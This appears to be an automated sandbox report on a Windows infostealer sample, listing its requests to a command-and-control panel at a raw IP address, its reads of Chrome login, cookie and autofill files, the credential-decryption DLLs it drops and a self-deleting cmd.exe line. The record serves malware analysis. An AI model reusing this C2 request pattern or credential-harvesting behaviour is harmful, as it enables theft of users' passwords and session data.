Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 22, 2021, 1:53 p.m. | July 22, 2021, 1:55 p.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
134.209.203.126 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .vmp0 |
section | .vmp1 |
suspicious_features | Connection to IP address | suspicious_request | GET http://134.209.203.126/hornycock/system/assets/bundle.bin | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://134.209.203.126/hornycock/gate.php?type=settings | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://134.209.203.126/hornycock/gate.php?type=ip | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1 |
request | GET http://134.209.203.126/hornycock/system/assets/bundle.bin |
request | GET http://134.209.203.126/hornycock/gate.php?type=settings |
request | GET http://134.209.203.126/hornycock/gate.php?type=ip |
request | GET http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 |
request | GET http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Local Extension Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Cookies |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\twain_32.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\zip.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\freebl3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\vcruntime140.dll |
cmdline | "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin" |
cmdline | cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin" |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\freebl3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\twain_32.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\zip.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\12.bin |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-synch-l1-2-0.dll |